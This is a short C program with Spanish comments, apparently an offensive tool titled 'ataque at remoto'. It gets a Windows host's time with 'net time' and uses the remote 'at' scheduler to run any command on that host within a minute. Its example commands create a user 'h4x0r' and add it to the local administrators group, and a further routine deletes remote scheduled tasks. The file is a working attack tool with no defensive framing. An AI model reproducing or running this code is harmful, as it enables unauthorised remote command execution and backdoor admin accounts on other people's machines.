// ataque at remoto
// sha0@BadCheckSum.com

#include <stdio.h>

void programa (const char *, const char *, char *);
void desprograma (const char *, int );
char *calcula_hora (char *, char*);
void ejecutar (char *, char *, int);

typedef struct   {
       int hora;
       int minuto;
} remotetime;

remotetime t;



int main (int argc, char **argv) {
    char *POC1="att 192.168.10.100 \"net user /ADD h4x0r\"";
    char *POC2="att 192.168.10.100 \"net localgroup localadmins /ADD h4x0r\"";
    char *POC3="att 192.168.10.100 \"/interactive notepad c:\\muh4h4h4\"";
    char hora[6];
    
    //desprograma (argv[1],30);  borrado de tareas remoto

    if (argc!=3) {
        printf ("uso: %s  host comando\n",argv[0]);
        printf ("comandos de ejemplo:   (interactive->interactua con escritorio)\n");
        printf ("%s\n%s\n%s\n\n",POC1,POC2,POC3);
        return 0;
    }

    calcula_hora(argv[1],hora);
    programa (argv[1],argv[2],hora);
    return 0;   
}


//para borar programa  at \\ip id /delete
void programa (const char *host, const char *cmd, char *hora) {
    char at[200];
    char buff[500];

    snprintf (at,199,"at \\\\%s %s %s",host,hora,cmd); 
    ejecutar (at,buff,sizeof(buff));

    snprintf (at,199,"at \\\\%s ",host);
    ejecutar (at,buff,sizeof(buff));
    //printf (">>%s\n",buff);
}

char *calcula_hora (char *host, char *phora) {
      char time[200];
      char temp[3];
      char buff[80]="";
      char *p;
      int digit;

      memset (time,0,sizeof(time));
      snprintf (time,190,"net time \\\\%s",host);

      ejecutar (time,buff,sizeof(buff));

      if ((p = strstr(buff,":"))) {
            memset(phora, 0, 6);
            memcpy(phora,p-2,5);
            
            if (phora[0] == ' ') {
               temp[0]=*(phora+1);
               temp[1]=temp[2]=0x00;
               digit=1;
            } else {
               temp[0]=*phora;
               temp[1]=*(phora+1);
               temp[2]=0x00;
               digit=2;
            }

            t.hora = atoi(temp);
            t.minuto = atoi (phora+3) +1;
      
            if ((strstr(buff,"PM")!=0))
               t.hora+=12;
               
            itoa(t.hora,temp,10);
            memset (phora,0,6);
            memcpy (phora,temp,2);
            memset (phora+digit,':',1);
            itoa(t.minuto,temp,10);
            memcpy (phora+digit+1,temp,2);            
            printf ("Se ejecutara en menos de un minuto\n");
      }
}

//Desprograma tareas remotamente
void desprograma (const char *host, int maxId) {
     int i;
     char at[200];
     char buff[500];

     for (i=0;i<=maxId;i++) {
         snprintf (at,199,"at \\\\%s %d /delete",host,i); 
         ejecutar (at,buff,sizeof(buff));
     }
}

void ejecutar (char *cmd, char *resp, int tam_resp) {
        FILE *f;

        //printf ("DEBUG:%s\n",cmd);
        f=popen(cmd,"r");
        fgets(resp,tam_resp,f);
        pclose(f);
}